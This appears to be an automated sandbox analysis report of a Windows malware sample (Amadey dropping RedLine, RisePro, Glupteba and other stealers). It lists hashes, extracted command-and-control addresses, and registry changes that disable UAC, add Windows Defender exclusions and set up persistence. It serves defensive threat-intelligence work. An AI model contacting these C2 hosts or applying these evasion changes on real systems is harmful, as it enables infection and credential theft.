amadey | 321315a3a88aac7efc284ab9c116bdb7838b691a4f6f6b52fdbb3dbb395b31f0

Analysis

max time kernel
45s
max time network
150s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
07-05-2024 09:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b682c3664db86649adee19d99ff7d141.exe
Size

1.5MB
MD5

b682c3664db86649adee19d99ff7d141
SHA1

d3d3529b099f16009958b2ab82fab1def5fc0138
SHA256

321315a3a88aac7efc284ab9c116bdb7838b691a4f6f6b52fdbb3dbb395b31f0
SHA512

25b5978e2e3f8395eb4692c50b93d5a46ea25f2d86b8932e2abbeca015bdda2806b25512ef1dda0eb7f33a91eec0f682089ae1a04b92dfa14e72ba47ea06dedd
SSDEEP

24576:gE/SLb14jmObQvmsU/OR2q21rbVIu5rS3SO+shjOEArpWwc0TFqD+KRVh6rLBBP:FMOsvHAOoqgrbV35rSiXshpmp3QD+ZT

Score

10^/10

amadey glupteba privateloader redline risepro zgrat test1234 discovery dropper evasion execution infostealer loader persistence rat spyware stealer themida trojan

Malware Config

Extracted

Family

amadey

Version

4.20

http://193.233.132.139

Attributes

install_dir
5454e6f062
install_file
explorta.exe
strings_key
c7a869c5ba1d72480093ec207994e2bf
url_paths
/sev56rkm/index.php

rc4.plain

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

amadey

Version

4.18

http://193.233.132.56

Attributes

install_dir
09fd851a4f
install_file
explorha.exe
strings_key
443351145ece4966ded809641c77cfa8
url_paths
/Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

Test1234

185.215.113.67:26260

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral1/memory/3336-1105-0x00000000001A0000-0x00000000039D4000-memory.dmp	family_zgrat_v1
behavioral1/memory/3336-1184-0x000000001EB60000-0x000000001EC6A000-memory.dmp	family_zgrat_v1
behavioral1/memory/3336-1190-0x0000000005AA0000-0x0000000005AC4000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	orQUS74tII6F7s1GwG2x83gk.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0006000000015cfe-228.dat	family_redline
behavioral1/memory/1660-238-0x0000000000A50000-0x0000000000AA2000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

Windows security bypass 2 TTPs 10 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\kHwixM0W4pufUOuFL9bbFg2C.exe = "0"	kHwixM0W4pufUOuFL9bbFg2C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\20r6ObZueJIz8FampZWGtc4C.exe = "0"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\YXZPFidGwUYbW3HBUdkjxo2P.exe = "0"	YXZPFidGwUYbW3HBUdkjxo2P.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\lnfB347XiMLDThAET8cP8aEn.exe = "0"	lnfB347XiMLDThAET8cP8aEn.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	orQUS74tII6F7s1GwG2x83gk.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b682c3664db86649adee19d99ff7d141.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a3ad3d4d5f.exe

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
1448	bcdedit.exe
3584	bcdedit.exe
1504	bcdedit.exe
1052	bcdedit.exe
2132	bcdedit.exe
1728	bcdedit.exe
2740	bcdedit.exe
2836	bcdedit.exe
2504	bcdedit.exe
3408	bcdedit.exe
688	bcdedit.exe
1260	bcdedit.exe
1180	bcdedit.exe
1656	bcdedit.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
82	3328	rundll32.exe
85	3680	u1a0.1.exe
121	3680	u1a0.1.exe
122	3712	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1744	powershell.exe
2424	powershell.exe
3872	powershell.exe
3852	powershell.exe
688	powershell.exe
1428	powershell.EXE
3380	powershell.exe
3160	powershell.exe
1688	powershell.exe
3204	powershell.exe
3760	powershell.exe
3508	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 5 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4072	netsh.exe
3124	netsh.exe
3668	netsh.exe
3576	netsh.exe
4036	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b682c3664db86649adee19d99ff7d141.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	orQUS74tII6F7s1GwG2x83gk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b682c3664db86649adee19d99ff7d141.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a3ad3d4d5f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a3ad3d4d5f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	orQUS74tII6F7s1GwG2x83gk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WafvFYQDPtx7tS2FXpCtLBFZ.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lT7mzwVLBwbhnz3lfGfrug0W.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CTEkofUD2FVUUTWu7kY0Rcbh.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yHdhChhWvtuXI1ueo92BZyBN.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GPjXpJp9FPJpHRRNQolxdSHv.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N8ID6BBZ6ou1IPqZXVrKklK6.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ekYetX7vLpmhWG9FiURvTmWG.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c2gpjRBaQY7gFSxkkb4WkBFP.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ALF7a9y4UzwQJLMMHAfLjXk1.bat	CasPol.exe

Executes dropped EXE 53 IoCs

pid	Process
2900	explorta.exe
2540	explorta.exe
1936	amert.exe
2128	explorha.exe
644	a3ad3d4d5f.exe
2264	swiiiii.exe
2280	b0dcc639cc.exe
1660	jok.exe
2688	swiiii.exe
2448	file300un.exe
2040	gold.exe
1656	aMRx9WMr2WpXO48F3onpMOLe.exe
3004	kHwixM0W4pufUOuFL9bbFg2C.exe
1144	lnfB347XiMLDThAET8cP8aEn.exe
1944	YXZPFidGwUYbW3HBUdkjxo2P.exe
2452	20r6ObZueJIz8FampZWGtc4C.exe
3112	alexxxxxxxx.exe
1868	u1a0.0.exe
3656	install.exe
3680	u1a0.1.exe
3952	NewB.exe
3404	ISetup8.exe
3664	GameService.exe
3124	GameService.exe
1848	GameService.exe
1656	YXZPFidGwUYbW3HBUdkjxo2P.exe
3728	GameService.exe
3532	GameService.exe
3796	lnfB347XiMLDThAET8cP8aEn.exe
3856	20r6ObZueJIz8FampZWGtc4C.exe
3840	toolspub1.exe
1232	kHwixM0W4pufUOuFL9bbFg2C.exe
3804	orQUS74tII6F7s1GwG2x83gk.exe
3736	GameSyncLink.exe
3440	864058.exe
4036	GameService.exe
2244	GameService.exe
1740	GameService.exe
1552	GameService.exe
1988	GameService.exe
3740	PiercingNetLink.exe
3268	4767d2e713f2021e8fe856e3ea638b58.exe
2932	u2mk.0.exe
3344	4767d2e713f2021e8fe856e3ea638b58.exe
3212	csrss.exe
3828	GameService.exe
3824	GameService.exe
3756	GameService.exe
3240	GameService.exe
3444	u2mk.1.exe
3560	GameSyncLinks.exe
3132	106364.exe
3272	92C8KgRHR5TJpG1ZOoDEEjmo.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Wine	explorta.exe
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Wine	amert.exe
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Wine	explorha.exe

Loads dropped DLL 64 IoCs

pid	Process
2344	b682c3664db86649adee19d99ff7d141.exe
2900	explorta.exe
2900	explorta.exe
1936	amert.exe
2900	explorta.exe
2128	explorha.exe
2900	explorta.exe
2012	WerFault.exe
2012	WerFault.exe
2012	WerFault.exe
2012	WerFault.exe
2012	WerFault.exe
2128	explorha.exe
2128	explorha.exe
2128	explorha.exe
2128	explorha.exe
2128	explorha.exe
2128	explorha.exe
2000	CasPol.exe
2000	CasPol.exe
2000	CasPol.exe
2000	CasPol.exe
2000	CasPol.exe
2000	CasPol.exe
2000	CasPol.exe
2000	CasPol.exe
2000	CasPol.exe
1656	aMRx9WMr2WpXO48F3onpMOLe.exe
1656	aMRx9WMr2WpXO48F3onpMOLe.exe
1656	aMRx9WMr2WpXO48F3onpMOLe.exe
1656	aMRx9WMr2WpXO48F3onpMOLe.exe
2128	explorha.exe
2128	explorha.exe
3144	WerFault.exe
3144	WerFault.exe
3144	WerFault.exe
3144	WerFault.exe
3304	rundll32.exe
3304	rundll32.exe
3304	rundll32.exe
3304	rundll32.exe
3328	rundll32.exe
3328	rundll32.exe
3328	rundll32.exe
3328	rundll32.exe
2128	explorha.exe
1656	aMRx9WMr2WpXO48F3onpMOLe.exe
1656	aMRx9WMr2WpXO48F3onpMOLe.exe
1656	aMRx9WMr2WpXO48F3onpMOLe.exe
1656	aMRx9WMr2WpXO48F3onpMOLe.exe
2128	explorha.exe
3952	NewB.exe
4020	cmd.exe
3952	NewB.exe
3952	NewB.exe
3532	GameService.exe
3532	GameService.exe
2000	CasPol.exe
1868	u1a0.0.exe
1868	u1a0.0.exe
3736	GameSyncLink.exe
3440	864058.exe
3712	rundll32.exe
3712	rundll32.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 33 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/2344-0-0x0000000000210000-0x00000000006FE000-memory.dmp	themida
behavioral1/memory/2344-1-0x0000000000210000-0x00000000006FE000-memory.dmp	themida
behavioral1/memory/2344-3-0x0000000000210000-0x00000000006FE000-memory.dmp	themida
behavioral1/memory/2344-2-0x0000000000210000-0x00000000006FE000-memory.dmp	themida
behavioral1/memory/2344-5-0x0000000000210000-0x00000000006FE000-memory.dmp	themida
behavioral1/memory/2344-4-0x0000000000210000-0x00000000006FE000-memory.dmp	themida
behavioral1/memory/2344-8-0x0000000000210000-0x00000000006FE000-memory.dmp	themida
behavioral1/memory/2344-6-0x0000000000210000-0x00000000006FE000-memory.dmp	themida
behavioral1/memory/2344-7-0x0000000000210000-0x00000000006FE000-memory.dmp	themida
behavioral1/memory/2344-21-0x0000000000210000-0x00000000006FE000-memory.dmp	themida
behavioral1/memory/2900-25-0x0000000000A00000-0x0000000000EEE000-memory.dmp	themida
behavioral1/memory/2900-30-0x0000000000A00000-0x0000000000EEE000-memory.dmp	themida
behavioral1/memory/2900-28-0x0000000000A00000-0x0000000000EEE000-memory.dmp	themida
behavioral1/memory/2900-26-0x0000000000A00000-0x0000000000EEE000-memory.dmp	themida
behavioral1/memory/2900-29-0x0000000000A00000-0x0000000000EEE000-memory.dmp	themida
behavioral1/memory/2900-27-0x0000000000A00000-0x0000000000EEE000-memory.dmp	themida
behavioral1/memory/2900-23-0x0000000000A00000-0x0000000000EEE000-memory.dmp	themida
behavioral1/memory/2900-24-0x0000000000A00000-0x0000000000EEE000-memory.dmp	themida
behavioral1/memory/2900-22-0x0000000000A00000-0x0000000000EEE000-memory.dmp	themida
behavioral1/files/0x0007000000014825-20.dat	themida
behavioral1/memory/2344-19-0x0000000004E50000-0x000000000533E000-memory.dmp	themida
behavioral1/memory/2540-50-0x0000000000A00000-0x0000000000EEE000-memory.dmp	themida
behavioral1/files/0x0006000000015605-113.dat	themida
behavioral1/memory/644-123-0x00000000011B0000-0x0000000001849000-memory.dmp	themida
behavioral1/memory/644-125-0x00000000011B0000-0x0000000001849000-memory.dmp	themida
behavioral1/memory/644-124-0x00000000011B0000-0x0000000001849000-memory.dmp	themida
behavioral1/memory/644-126-0x00000000011B0000-0x0000000001849000-memory.dmp	themida
behavioral1/memory/644-128-0x00000000011B0000-0x0000000001849000-memory.dmp	themida
behavioral1/memory/644-127-0x00000000011B0000-0x0000000001849000-memory.dmp	themida
behavioral1/memory/2900-286-0x0000000000A00000-0x0000000000EEE000-memory.dmp	themida
behavioral1/memory/644-825-0x00000000011B0000-0x0000000001849000-memory.dmp	themida
behavioral1/memory/3804-935-0x0000000140000000-0x0000000140862000-memory.dmp	themida
behavioral1/memory/3804-1143-0x0000000140000000-0x0000000140862000-memory.dmp	themida

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\20r6ObZueJIz8FampZWGtc4C.exe = "0"	20r6ObZueJIz8FampZWGtc4C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\kHwixM0W4pufUOuFL9bbFg2C.exe = "0"	kHwixM0W4pufUOuFL9bbFg2C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\lnfB347XiMLDThAET8cP8aEn.exe = "0"	lnfB347XiMLDThAET8cP8aEn.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\YXZPFidGwUYbW3HBUdkjxo2P.exe = "0"	YXZPFidGwUYbW3HBUdkjxo2P.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	kHwixM0W4pufUOuFL9bbFg2C.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\a3ad3d4d5f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\a3ad3d4d5f.exe"	explorta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\b0dcc639cc.exe = "C:\\Users\\Admin\\1000021002\\b0dcc639cc.exe"	explorta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	lnfB347XiMLDThAET8cP8aEn.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	20r6ObZueJIz8FampZWGtc4C.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	YXZPFidGwUYbW3HBUdkjxo2P.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	a3ad3d4d5f.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	orQUS74tII6F7s1GwG2x83gk.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	b682c3664db86649adee19d99ff7d141.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
49	pastebin.com
51	pastebin.com
212	drive.google.com
213	drive.google.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
108	api.myip.com
109	api.myip.com
115	ipinfo.io
116	ipinfo.io

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0006000000015c6b-154.dat	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	orQUS74tII6F7s1GwG2x83gk.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	orQUS74tII6F7s1GwG2x83gk.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	orQUS74tII6F7s1GwG2x83gk.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	orQUS74tII6F7s1GwG2x83gk.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
2540	explorta.exe
1936	amert.exe
2128	explorha.exe
3804	orQUS74tII6F7s1GwG2x83gk.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2900 set thread context of 2540	2900	explorta.exe	29
PID 2264 set thread context of 3056	2264	swiiiii.exe	36
PID 2688 set thread context of 2600	2688	swiiii.exe	58
PID 2448 set thread context of 2000	2448	file300un.exe	60

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	kHwixM0W4pufUOuFL9bbFg2C.exe
File opened (read-only)	\??\VBoxMiniRdrDN	20r6ObZueJIz8FampZWGtc4C.exe
File opened (read-only)	\??\VBoxMiniRdrDN	lnfB347XiMLDThAET8cP8aEn.exe
File opened (read-only)	\??\VBoxMiniRdrDN	YXZPFidGwUYbW3HBUdkjxo2P.exe

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	20r6ObZueJIz8FampZWGtc4C.exe
File created	C:\Windows\rss\csrss.exe	20r6ObZueJIz8FampZWGtc4C.exe
File created	C:\Windows\rss\csrss.exe	YXZPFidGwUYbW3HBUdkjxo2P.exe
File created	C:\Windows\Tasks\explorta.job	b682c3664db86649adee19d99ff7d141.exe
File opened for modification	C:\Windows\rss	lnfB347XiMLDThAET8cP8aEn.exe
File opened for modification	C:\Windows\rss	YXZPFidGwUYbW3HBUdkjxo2P.exe
File opened for modification	C:\Windows\rss	kHwixM0W4pufUOuFL9bbFg2C.exe
File created	C:\Windows\rss\csrss.exe	kHwixM0W4pufUOuFL9bbFg2C.exe
File created	C:\Windows\Tasks\explorha.job	amert.exe
File created	C:\Windows\rss\csrss.exe	lnfB347XiMLDThAET8cP8aEn.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3836	sc.exe
3604	sc.exe
3704	sc.exe
3640	sc.exe
3588	sc.exe
1740	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
564	3056	WerFault.exe	36
2012	2264	WerFault.exe	34
3144	3112	WerFault.exe	70

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1a0.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1a0.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2mk.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2mk.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2mk.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1a0.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u1a0.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u1a0.0.exe

Creates scheduled task(s) 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2784	schtasks.exe
